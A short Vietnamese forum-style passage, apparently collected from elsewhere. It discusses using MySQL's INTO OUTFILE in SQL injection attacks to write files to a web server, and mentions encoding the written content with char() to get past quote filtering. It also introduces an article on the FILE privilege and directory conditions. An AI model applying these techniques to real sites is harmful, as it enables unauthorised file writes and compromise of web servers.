-Tôi không biết cách nào để mã hóa FILENAME trong INTO OUTFILE('FILENAME') chặn ' thì không khai thác được, biết cách khai thác vui lòng PM
-có thể mã hóa code bạn muốn ghi vào file bằng lệnh char()Trong bài viết này tôi sẽ đề cập đến câu lệnh "into outfile", 1 câu lệnh mặc định của MySQl nhưng lại rất hữu ích cho các attacker khi tấn công web bị dính lỗi SQL Injection (tất nhiên DBs là MySQL). Ngoài ra chúng ta cũng sẽ xem xét qua một số điều kiện như quyền đối với file (FILE privilege) và vấn đề thư mục liên quan.
(Sưu tầm)

